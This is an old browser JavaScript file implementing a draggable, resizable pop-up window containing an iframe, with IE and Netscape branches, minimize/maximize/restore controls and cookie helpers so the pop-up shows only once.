<!--
// Detect if the browser is IE or not.
// If it is not IE, we assume that the browser is NS.
		
var	window_resize;	
	window_title = "Widnow Popup";
	font_face = "Verdana";
	font_color = "#FFFFFF";
	font_size = "2";
var crossobj;
var frmURL; 		
		
//var IE = document.all?true:false


var MouseD = "False"
var ResizeL = "False"
var iFrmHeight=0;
// Temporary variables to hold mouse x-y pos.s
var temp1X = 0
var temp1Y = 0
var check=0

var restore_top
var restore_left
var restore_width
var restore_height
var wresize
var status = ""
var popup_status
var popup_title
//var dragapproved1
var IE = document.all?true:false
var dragapproved;
// If NS -- that is, !IE -- then set up for mouse capture
if (!IE)
{
	document.captureEvents(Event.MOUSEMOVE)
	document.captureEvents(Event.MOUSEDOWN)
	document.captureEvents(Event.MOUSEUP)
}

// Set-up to use getMouseXY function onMouseMove
//document.onmousemove = getMouseXY;

function goResize()
{
	ResizeL = "True"
}

function getMouseDown()
{
  if (IE)
  {
	if (ResizeL == "True")
	{
		MouseD = "True";
		LayerWidth = parseInt(document.all.showimage.style.width)
		LayerHeight = parseInt(document.all.showimage.style.height)
		if (isNaN(LayerHeight))
		{
			LayerHeight = 0;
		}
		StartX = temp1X
		StartY = temp1Y
	}
  }else
  {
	if (ResizeL == "True")
	{
		MouseD = "True";
		LayerWidth = parseInt(crossobj.style.width)
		LayerHeight = parseInt(crossobj.style.height)
		if (isNaN(LayerHeight))
		{
			LayerHeight = 0;
		}
		StartX = temp1X
		StartY = temp1Y
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
  }
}

function getMouseUp()
{
	MouseD = "False";
	ResizeL = "False";
	dragapproved=false
	document.onmousemove=getMouseXY
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
//	stopns()
}

// Main function to retrieve mouse x-y pos.s

function getMouseXY(e)
{
  if (IE)
  { // grab the x-y pos.s if browser is IE
    temp1X = event.clientX + document.body.scrollLeft
    temp1Y = event.clientY + document.body.scrollTop
	if (MouseD == "True")
	{
		EndX = temp1X
		EndY = temp1Y
		lwidth=(LayerWidth + (EndX - StartX))
		lheight=(LayerHeight + (EndY - StartY))
		
		if(lwidth<200) 
			lwidth=200		
		if(lheight<100)
			lheight=100				
		document.all.showimage.style.width = lwidth +'px'
		document.all.showimage.style.height = lheight +'px'
/*				
		document.all.showimage.style.width = (LayerWidth + (EndX - StartX))+'px'
		document.all.showimage.style.height = (LayerHeight + (EndY - StartY))+'px'
*/
		document.all.myIframe.style.height = '100%'
		if (document.getElementById("w_status").innerText != "Done")
		{
			document.getElementById("w_status").innerText = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
		}
	}
  } else {  // grab the x-y pos.s if browser is NS
  			
  		temp1X = e.pageX + window.pageXOffset
	    temp1Y = e.pageY + window.pageYOffset
    //temp1X = e.pageX
    //temp1Y = e.pageY
	
	if (MouseD == "True")
	{
		EndX = temp1X
		EndY = temp1Y
		lwidth=(LayerWidth + (EndX - StartX))
		lheight=(LayerHeight + (EndY - StartY))
		
		if(lwidth<200) 
			lwidth=200		
		if(lheight<100)
			lheight=100				
		document.getElementById("showimage").style.width = lwidth +'px'
		document.getElementById("showimage").style.height = lheight +'px'
		if (document.getElementById("w_status").innerHTML != "Done")
		{
			document.getElementById("w_status").innerHTML = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
		if (ns6)
		{
			document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
			document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
		}
	}
  }  
  // catch possible negative values in NS4
//  if (temp1X < 0){temp1X = 0}
//  if (temp1Y < 0){temp1Y = 0}  
  // show the position values in the form named Show
  // in the text fields named MouseX and MouseY
  return true
}

//-->

var ns4=document.layers
var ie4=document.all
var ns6=document.getElementById&&!document.all

//drag drop function for NS 4////
/////////////////////////////////

var dragswitch=0
var nsx
var nsy
var nstemp
var dragapproved1_g

function drag_dropns(name)
{
if (!ns4)
return
temp=eval(name)
temp.captureEvents(Event.MOUSEDOWN | Event.MOUSEUP)
temp.onmousedown=gons
temp.onmousemove=dragns
temp.onmouseup=stopns
}

function gons(e)
{
temp.captureEvents(Event.MOUSEMOVE)
nsx=e.x
nsy=e.y
}
function dragns(e)
{
if (dragswitch==1){
temp.moveBy(e.x-nsx,e.y-nsy)
return false
}
}

function stopns()
{
	temp.releaseEvents(Event.MOUSEMOVE)
}

//drag drop function for ie4+ and NS6////
/////////////////////////////////


function drag_drop(e){
if (ResizeL == "True")
{
	getMouseXY(event)
	return;
}
//alert(dragapproved)
if (ie4&&dragapproved){
crossobj.style.left=tempx+event.clientX-offsetx
crossobj.style.top=tempy+event.clientY-offsety
if (parseInt(crossobj.style.top) < 0)
{
	crossobj.style.top = 0;
}
if (parseInt(crossobj.style.left) < 0)
{
	crossobj.style.left = 0;
}
return false
}
else if (ns6&&dragapproved){
crossobj.style.left=tempx+e.clientX-offsetx+"px"
crossobj.style.top=tempy+e.clientY-offsety+"px"
return false
}
}

function initializedrag(e){
var firedobj=ns6? e.target : event.srcElement
var topelement=ns6? "html" : document.compatMode!="BackCompat"? "documentElement" : "body"
while (firedobj.tagName!=topelement.toUpperCase() && firedobj.id!="dragbar"){
firedobj=ns6? firedobj.parentNode : firedobj.parentElement
}

if (firedobj.id=="dragbar"){
offsetx=ie4? event.clientX : e.clientX
offsety=ie4? event.clientY : e.clientY

tempx=parseInt(crossobj.style.left)
tempy=parseInt(crossobj.style.top)

if (dragapproved1_g == "true")
{
	dragapproved=true
}
if (ResizeL == "False")
{
	document.onmousemove=drag_drop
}else
{
	//document.onmousedown = getMouseDown
	document.onmousemove=getMouseXY
}

}
}

//document.onmouseup=new Function("dragapproved=false")
document.onmouseup = getMouseUp
document.onmousedown = getMouseDown
document.onmousemove=getMouseXY
//document.onmouseup = getMouseUp;

////drag drop functions end here//////

function hidebox()
{
if (ie4||ns6)
{
crossobj.style.visibility="hidden"
document.getElementById("myIframe").src=''
document.getElementById("showimage").style.top = '0px'
document.getElementById("showimage").style.left = '0px'
document.getElementById("showimage").style.width = '0px'
document.getElementById("showimage").style.height = '0px'
document.getElementById("showimage").style.visibility = 'hidden'

document.getElementById("restore").style.visibility="hidden"
document.getElementById("minimize").style.visibility = 'hidden'
document.getElementById("restoreup").style.visibility = 'hidden'

document.getElementById("resz").style.height = '0px'
document.getElementById("resz_td").style.height = '0px'
document.getElementById("resz_1").style.height = '0px'
document.getElementById("resz_1_td").style.height = '0px'
document.getElementById("resz").style.visibility="hidden"
document.getElementById("image").style.visibility="hidden"
document.getElementById("resz").style.visibility="hidden"
document.getElementById("resz_1_td").style.visibility="hidden"
//document.getElementById("resz").style.visibility="hide"
}
else
{ 
	if (ns4)
	{
		document.showimage.visibility="hide"
		document.restore.visibility = "hide"
	}
}
}
function SetCooKie(name,value)
{
	var argv=SetCooKie.arguments;
	var argc=SetCooKie.arguments.length
	var expires=(argc>2) ? argv[2] : null
	var path=(argc>3) ? argv[3] : null
	var domain=(argc>4) ? argv[4] : null
	var secure=(argc>5) ? argv[5] : false
	document.cookie=name + "=" +escape(value) + 
	((expires==null) ? "" :( ";expires=" + expires.toGMTString())) +
	((path==null) ? "" :( ";path=" + path)) +
	((domain==null) ? "" :( ";domain=" + domain)) +
	((secure==true) ? "; secure " : "")
}

function DeleteCookie (name,path,domain) 
{
	if (GetCookie(name)) {
		document.cookie = name + "=" +
		((path) ? "; path=" + path : "") +
		((domain) ? "; domain=" + domain : "") +
		"; expires=Thu, 01-Jan-70 00:00:01 GMT";
	}
}

/*function GetCookie(name)
{	
	var arg=name + "=" 
	var alen=arg.length
	var clen=document.cookie.length
	var i=0
	while((i<clen) && (i>0))
	{
		var j=i+alen
		if (document.cookie.substring(i,j)==arg)
		{
			//getCookieVal(j)
			return true;
		}
		i=document.cookie.indexOf(" ", i) + i;
		if ( i==0) break;
	}
	return false;
}*/

function GetCookie(name)
{	
	var arg=name + "=" 
	var alen=arg.length
	var clen=document.cookie.length
	var i=0,prev=0;next=0;
	var retval=false;
	while(true)
	{
		next=document.cookie.indexOf("; ", prev);
		if(next<=0)
		{
			var chkval=document.cookie.substring(prev,clen);
			var eqpos=chkval.indexOf("=", 0);
			if(eqpos>0)
			{
				if((chkval.substring(0,eqpos+1))==arg)
				{
					retval=true;
					break;
				}	
			}	
			break;				
		}
		if(next>0)
		{
			var chkval=document.cookie.substring(prev,next);
			var eqpos=chkval.indexOf("=", 0);
			if(eqpos>0)
			{
				if((chkval.substring(0,eqpos+1))==arg)
				{
					retval=true;
					break;
				}	
			}
			
		}
		prev=next+2;	
	}
	return retval;
}


function getCookieVal(offset)
{
	var endstr=document.cookie.indexOf(";",offset)
	if(endstr==-1)
	{
		endstr=document.cookie.length;
	}
	return unescape(document.cookie.substring(offset,endstr));
} 
function DelayShow()
{
	document.getElementById("showimage").style.visibility = 'visible';
/*	if (ie||w3)
        adDiv.visibility="visible";
        else
        adDiv.visibility ="show";
	return;
*/

	document.getElementById("myIframe").src=frmURL
	document.getElementById("w_status").innerText = "Loading "+document.getElementById("myIframe").src
	popup_status = document.getElementById("w_status").innerText
	document.getElementById("w_status").innerText = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")
	document.getElementById("myIframe").style.visibility='visible';	
}

function WindowPopUp(height,width,top,left,windowresize,title,titlebgcolor,titleforecolor,dragapproved1,url,delayTime,showeverytime)
{
crossobj=ns6? document.getElementById("showimage") : document.all.showimage
dragapproved1_g = dragapproved1
check_dapproved = dragapproved1
frmURL=url;
wresize = windowresize

document.getElementById("myIframe").style.scrollbarBaseColor='#FF0000'
//document.getElementById("myIframe").style.scrollbarBaseColor='#FF0000'
//document.getElementById("myIframe").style.changeScrollbarColor='#FF0000'

	var chkshow=false;
	if (!showeverytime)
	{
		chkshow=GetCookie('popalert');
		if (!chkshow)
			SetCooKie('popalert','added')		
	
	}
	else
	{
		DeleteCookie('popalert')
	}
	
	if(!chkshow)
	{
		if (ns4)
		{	
			templayer=document.layers[0]
			templayer.left=left
			templayer.top=top
			templayer.width=width
			templayer.height=height		
		}
		else if (ns6)
		{	
			document.getElementById("showimage").style.height=height
			document.getElementById("showimage").style.width =width
			document.getElementById("showimage").style.left =left
			document.getElementById("showimage").style.top =top				
			//alert(document.getElementById("dragbar").innerTEXT)
			document.getElementById("dragbar").innerHTML=title
			popup_title = document.getElementById("dragbar").innerHTML
			if (popup_title != "")
			{
				if ((popup_title.length * 10) > parseInt(document.getElementById("showimage").style.width))
				document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
			}
			if (titlebgcolor != "")
			{
				document.getElementById("dragbar").style.backgroundColor=titlebgcolor
				document.getElementById("dragbar").style.color = titleforecolor
//				document.getElementById("dragbar").style.width='80%'
				document.getElementById("dragbar1").style.backgroundColor=titlebgcolor
				document.getElementById("dragbar1").style.color = titleforecolor
			}
			
			if (windowresize == "false")
			{
//				document.getElementById("w_status").style.fontSize = '10px'
				document.getElementById("resz_1_td").style.visibility="hidden"
				document.getElementById("image").style.visibility="hidden"
/*				document.getElementById("resz").style.height = '0px'
				document.getElementById("resz_td").style.height = '0px'
			//	alert(document.getElementById("resz_1").style.height)
				document.getElementById("resz_1").style.height = '0px'
				document.getElementById("resz_1_td").style.height = '0px'
				document.getElementById("resz").style.visibility="hide" 
*/
			}
				//alert(url + "  src" + document.getElementById("myIframe").src)
				/*document.getElementById("myIframe").src=url
				document.getElementById("w_status").innerHTML = "Loading "+document.getElementById("myIframe").src
				popup_status = document.getElementById("w_status").innerHTML
				document.getElementById("w_status").innerHTML = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")*/
				
			}
		else
		{	
			document.getElementById("showimage").style.height=height + 'px'
			document.getElementById("showimage").style.width =width + 'px'
			document.getElementById("showimage").style.left =left + 'px'
			document.getElementById("showimage").style.top =top + 'px'
			document.getElementById("dragbar").innerText=title
			popup_title = document.getElementById("dragbar").innerText
			if (popup_title != "")
			{
				if ((popup_title.length * 10) > parseInt(document.getElementById("showimage").style.width))
				document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
			}
			
			if (titlebgcolor != "")
			{
				document.getElementById("dragbar").style.backgroundColor=titlebgcolor
				document.getElementById("dragbar").style.color = titleforecolor
				document.getElementById("dragbar1").style.backgroundColor=titlebgcolor
				document.getElementById("dragbar1").style.color = titleforecolor
			}
			if (windowresize == "false")
			{
				document.getElementById("resz_1_td").style.visibility="hidden"
				document.getElementById("image").style.visibility="hidden"
/*				document.getElementById("resz").style.height = '0px'
				document.getElementById("resz_td").style.height = '0px'
			//	alert(document.getElementById("resz_1").style.height)
				document.getElementById("resz_1").style.height = '0px'
				document.getElementById("resz_1_td").style.height = '0px'
				document.getElementById("resz").style.visibility="hidden"
*/
			}
		
		//	document.getElementById("table1").style.borderColor=bordercolor
			/*document.getElementById("myIframe").src=url
			document.getElementById("w_status").innerText = "Loading "+document.getElementById("myIframe").src
			popup_status = document.getElementById("w_status").innerText
			document.getElementById("w_status").innerText = (popup_status.substr(0,parseInt(document.getElementById("showimage").style.width)/7) + "...")*/
		}	
/*		if(dragapproved1=="true")	
			dragapproved=true
		else
			dragapproved=false

		//setTimeout("Delaynew()",(sec*1000));	
*/
		setTimeout("DelayShow()",(delayTime*1000));
	}	
}
//WindowPopUp(300,350,100,100,'true','TitleText','White','red','true','testfr.htm')


function at()
{
	if (IE == false)
	{
		document.getElementById("myIframe").height=crossobj.style.height
	}else
	{
		document.getElementById("myIframe").height='100%'
	}
}

function Delaynew()
{
	if (!ns4)
		document.getElementById("showimage").style.visibility="visible";
	else
		document.showimage.visibility="show";
	
	return;
}

function maximize_pop()
{
if (wresize == "true")
{
	document.getElementById("myIframe").style.visibility = 'visible';
	if (IE)
  	{
		if (status != "minimize")
		{
			restore_top = document.all.showimage.style.top
			restore_left = document.all.showimage.style.left
			restore_width = document.all.showimage.style.width
			restore_height = document.all.showimage.style.height
		}else
		{
			document.all.minimize.style.width = '21px'
			document.all.minimize.style.height = '21px'
			document.all.minimize.style.visibility = 'visible'
			
			document.all.restoreup.style.width = '0px'
			document.all.restoreup.style.height = '0px'
			document.all.restoreup.style.visibility = 'hidden'
			
			document.getElementById("resz").style.height = '12px'
			document.getElementById("resz_td").style.height = '12px'
		//	alert(document.getElementById("resz_1").style.height)
			document.getElementById("resz_1").style.height = '12px'
			document.getElementById("resz_1_td").style.height = '12px'
			document.getElementById("w_status").style.fontSize = '10px'
			document.getElementById("resz").style.visibility="visible"
		}
		
		document.all.showimage.style.top = '0px'
		document.all.showimage.style.left = '0px'
		document.all.showimage.style.width =  parseInt(document.body.clientWidth)+'px'
		document.all.showimage.style.height =  parseInt(document.body.clientHeight)+'px'
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.all.maximize.style.width = '0px'
		document.all.maximize.style.height = '0px'
		
		document.all.restore.style.width = '21px'
		document.all.restore.style.height = '21px'
		document.all.restore.style.visibility = 'visible'
		dragapproved1_g = 'false'

		document.getElementById("w_status").style.fontSize = '10px'
		document.getElementById("resz_1_td").style.visibility="hidden"
		document.getElementById("image").style.visibility="hidden"
		
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}else
	{
		if (status != "minimize")
		{
			restore_top = document.getElementById("showimage").style.top
			restore_left = document.getElementById("showimage").style.left
			restore_width = document.getElementById("showimage").style.width
			restore_height = document.getElementById("showimage").style.height
		}else
		{
			document.getElementById("minimize").style.width = '21px'
			document.getElementById("minimize").style.height = '21px'
			document.getElementById("minimize").style.visibility = 'visible'
			
			document.getElementById("restoreup").style.width = '0px'
			document.getElementById("restoreup").style.height = '0px'
			document.getElementById("restoreup").style.visibility = 'hidden'
			
			document.getElementById("resz").style.height = '12px'
			document.getElementById("resz_td").style.height = '12px'
		//	alert(document.getElementById("resz_1").style.height)
			document.getElementById("resz_1").style.height = '12px'
			document.getElementById("resz_1_td").style.height = '12px'
			document.getElementById("w_status").style.fontSize = '10px'
			document.getElementById("resz").style.visibility="visible"
		}
		document.getElementById("showimage").style.top = '0px'
		document.getElementById("showimage").style.left = '0px'
		document.getElementById("showimage").style.width =  (parseInt(window.innerWidth) - 16)+'px'
		document.getElementById("showimage").style.height =  (parseInt(window.innerHeight) - 37)+'px'
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.getElementById("maximize").style.width = '0px'
		document.getElementById("maximize").style.height = '0px'
		
		document.getElementById("restore").style.width = '21px'
		document.getElementById("restore").style.height = '21px'
		document.getElementById("restore").style.visibility = 'visible'
		dragapproved1_g = 'false'
		
		document.getElementById("w_status").style.fontSize = '10px'
		document.getElementById("resz_1_td").style.visibility="hidden"
		document.getElementById("image").style.visibility="hidden"
		document.getElementById("myIframe").height=crossobj.style.height
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
status = "maximize"
}
}

function restore_pop()
{
	document.getElementById("myIframe").style.visibility = 'visible';
	if(IE)
	{
		document.all.showimage.style.top = restore_top
		document.all.showimage.style.left = restore_left
		document.all.showimage.style.width =  restore_width
		document.all.showimage.style.height =  restore_height
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.all.maximize.style.width = '21px'
		document.all.maximize.style.height = '21px'
		
		document.all.restore.style.width = '0px'
		document.all.restore.style.height = '0px'
		document.all.restore.style.visibility = 'hidden'
		if (check_dapproved == "true")
			dragapproved1_g = 'true'

		if (wresize == "true")
		{
			document.getElementById("resz_1_td").style.visibility="visible"
			document.getElementById("image").style.visibility="visible"
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}else
	{
		
		document.getElementById("showimage").style.top = restore_top
		document.getElementById("showimage").style.left = restore_left
		document.getElementById("showimage").style.width =  restore_width
		document.getElementById("showimage").style.height =  restore_height
		document.getElementById("myIframe").height=crossobj.style.height
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.getElementById("maximize").style.width = '21px'
		document.getElementById("maximize").style.height = '21px'
		
		
		document.getElementById("restore").style.width = '0px'
		document.getElementById("restore").style.height = '0px'
		document.getElementById("restore").style.visibility = 'hidden'
		dragapproved1_g = 'true'

		if (wresize == "true")
		{
			document.getElementById("resz").style.height = '12px'
			document.getElementById("resz_td").style.height = '12px'
		//	alert(document.getElementById("resz_1").style.height)
			document.getElementById("resz_1").style.height = '12px'
//			document.getElementById("resz_1_td").style.height = '12px'
			document.getElementById("resz").style.visibility="visible"
			document.getElementById("resz_1_td").style.visibility="visible"
			document.getElementById("image").style.visibility="visible"
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
status = "restore"
}

function minimize_pop()
{
	if(IE)
	{
		if (status != "maximize")
		{
			restore_top = document.all.showimage.style.top
			restore_left = document.all.showimage.style.left
			restore_width = document.all.showimage.style.width
			restore_height = document.all.showimage.style.height
		}else
		{
			document.all.maximize.style.width = '21px'
			document.all.maximize.style.height = '21px'
	//		document.all.maximize.style.visibility = 'vsible'
			
			document.all.restore.style.width = '0px'
			document.all.restore.style.height = '0px'
			document.all.restore.style.visibility = 'hidden'
		}

		document.getElementById("resz").style.height = '0px'
		document.getElementById("resz_td").style.height = '0px'
	//	alert(document.getElementById("resz_1").style.height)
		document.getElementById("resz_1").style.height = '0px'
		document.getElementById("resz_1_td").style.height = '0px'
		document.getElementById("w_status").style.fontSize = '0px'
		document.getElementById("resz").style.visibility="hidden"
		document.getElementById("image").style.visibility="hidden"
		
		document.all.showimage.style.width = '200px'
		document.all.showimage.style.height = '20px'
		
		document.all.minimize.style.width = '0px'
		document.all.minimize.style.height = '0px'
		document.all.minimize.style.visibility = 'hidden'
		
		document.all.restoreup.style.width = '21px'
		document.all.restoreup.style.height = '21px'
		document.all.restoreup.style.visibility = 'visible'
		if (popup_title != "")
		{
				if ((popup_title.length * 12) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/12) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}else
	{
		if (status != "maximize")
		{
			restore_top = document.getElementById("showimage").style.top
			restore_left = document.getElementById("showimage").style.left
			restore_width = document.getElementById("showimage").style.width
			restore_height = document.getElementById("showimage").style.height
		}else
		{
			document.getElementById("maximize").style.width = '21px'
			document.getElementById("maximize").style.height = '21px'
	//		document.all.maximize.style.visibility = 'vsible'
			
			document.getElementById("restore").style.width = '0px'
			document.getElementById("restore").style.height = '0px'
			document.getElementById("restore").style.visibility = 'hidden'
		}
		document.getElementById("image").style.visibility = 'hidden'
		document.getElementById("resz").style.height = '0px'
		document.getElementById("resz_td").style.height = '0px'
	//	alert(document.getElementById("resz_1").style.height)
		document.getElementById("resz_1").style.height = '0px'
		document.getElementById("resz_1_td").style.height = '0px'
		document.getElementById("w_status").style.fontSize = '0px'
		document.getElementById("image").style.visibility="hidden"

		//document.getElementById("resz").style.visibility="hidden"
		
		document.getElementById("showimage").style.width = '260px'
		document.getElementById("showimage").style.height = '0px'
		//alert(crossobj.style.height);
		iFrmHeight=document.getElementById("myIframe").height;
		document.getElementById("myIframe").height='0px';
		document.getElementById("myIframe").style.visibility = 'hidden'
		document.getElementById("minimize").style.width = '0px'
		document.getElementById("minimize").style.height = '0px'
		document.getElementById("minimize").style.visibility = 'hidden'
		
		document.getElementById("restoreup").style.width = '21px'
		document.getElementById("restoreup").style.height = '21px'
		document.getElementById("restoreup").style.visibility = 'visible'

		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
	document.getElementById("myIframe").style.visibility = 'hidden';
status = "minimize"
}

function restoreup_pop()
{
	document.getElementById("myIframe").style.visibility = 'visible';
	if(IE)
	{
		document.all.showimage.style.width =  restore_width
		document.all.showimage.style.height =  restore_height
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.all.minimize.style.width = '21px'
		document.all.minimize.style.height = '21px'
		document.all.minimize.style.visibility = 'visible'
		
		document.all.restoreup.style.width = '0px'
		document.all.restoreup.style.height = '0px'
		document.all.restoreup.style.visibility = 'hidden'
		if (check_dapproved == "true")
			dragapproved1_g = 'true'

		document.getElementById("resz").style.height = '12px'
		document.getElementById("resz_td").style.height = '12px'
	//	alert(document.getElementById("resz_1").style.height)
		document.getElementById("resz_1").style.height = '12px'
		document.getElementById("resz_1_td").style.height = '12px'
		document.getElementById("w_status").style.fontSize = '10px'
		document.getElementById("resz").style.visibility="visible"
		
		if (wresize == "false")
		{
			document.getElementById("resz_1_td").style.visibility="hidden"
			document.getElementById("image").style.visibility="hidden"
		}else
		{
			document.getElementById("resz_1_td").style.visibility="visible"
			document.getElementById("image").style.visibility="visible"
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerText = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerText = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}else
	{
		document.getElementById("image").style.visibility = 'visible'
		document.getElementById("showimage").style.width =  restore_width
		document.getElementById("showimage").style.height =  restore_height
		document.getElementById("myIframe").style.visibility = 'visible'
//		alert(document.all.maximize.src);
//		document.all.maximize.src = 'Mkt001HoverAdrestore.gif'
		document.getElementById("minimize").style.width = '21px'
		document.getElementById("minimize").style.height = '21px'
		document.getElementById("minimize").style.visibility = 'visible'
		document.getElementById("myIframe").height=iFrmHeight;
		document.getElementById("restoreup").style.width = '0px'
		document.getElementById("restoreup").style.height = '0px'
		document.getElementById("restoreup").style.visibility = 'hidden'
		dragapproved1_g = 'true'

		document.getElementById("resz").style.height = '12px'
		document.getElementById("resz_td").style.height = '12px'
	//	alert(document.getElementById("resz_1").style.height)
		document.getElementById("resz_1").style.height = '12px'
		document.getElementById("resz_1_td").style.height = '12px'
		document.getElementById("w_status").style.fontSize = '10px'
		document.getElementById("resz").style.visibility="visible"
		
		if (wresize == "false")
		{
			document.getElementById("resz_1_td").style.visibility="hidden"
			document.getElementById("image").style.visibility="hidden"
		}else
		{
			document.getElementById("resz_1_td").style.visibility="visible"
			document.getElementById("image").style.visibility="visible"
		}
		if (popup_title != "")
		{
				if ((popup_title.length * 10) >= parseInt(document.getElementById("showimage").style.width))
				{
					document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
				}else
				{
					document.getElementById("dragbar").innerHTML = popup_title
				}
//			document.getElementById("dragbar").innerHTML = (popup_title.substr(0,parseInt(document.getElementById("showimage").style.width)/10) + "...")
		}
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width = (parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height = (parseInt(document.getElementById("showimage").style.height) - 39)+'px'
	}
status = "restoreup"
}
function setthisFrame()
{
//alert("called");
//alert(document.getElementById("showimage").style.width);
	document.getElementById("iframeTD").style.fontSize = '0px';
	document.getElementById("iframeTD").style.visibility = 'hidden';
	document.getElementById("myIframe").style.left = '4px';
	document.getElementById("myIframe").style.top = '32px';
	if (document.getElementById("myIframe").src != '')
	{
		document.getElementById("myIframe").style.visibility = 'visible';
	}else
	{
		document.getElementById("myIframe").style.visibility = 'hidden';
	}
	if (ns6)
	{
		document.getElementById("myIframe").style.width=(parseInt(document.getElementById("showimage").style.width) - 7)+'px'
		document.getElementById("myIframe").style.height=(parseInt(document.getElementById("showimage").style.height) - 39)+'px'
		document.getElementById("w_status").innerHTML = "Done"
	}else
	{
		document.getElementById("w_status").innerText = "Done"
	}
	if (wresize == "true")
	{
		if (IE)
		{
			document.all.image.style.visibility="visible"
		}else
		{
			document.getElementById("image").style.visibility="visible"
		}
	}
}
function chk()
{
	if (ResizeL == "True")
	{
		getMouseUp();
	}else
	{
		dragapproved=false
	}
}

window.onload = at












